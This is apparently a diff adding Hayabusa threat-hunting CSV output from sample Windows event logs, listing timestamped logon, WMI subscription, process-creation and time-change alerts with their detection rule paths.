+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x39a20  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x39a67  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x24902  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x24936  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:43:44.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:44:02.385 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x19489  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x194bb  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x19153  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1917f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:59:43.385 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:17:38.760 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:21:25.557 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:27:57.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:38:14.682 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b15e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b18a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
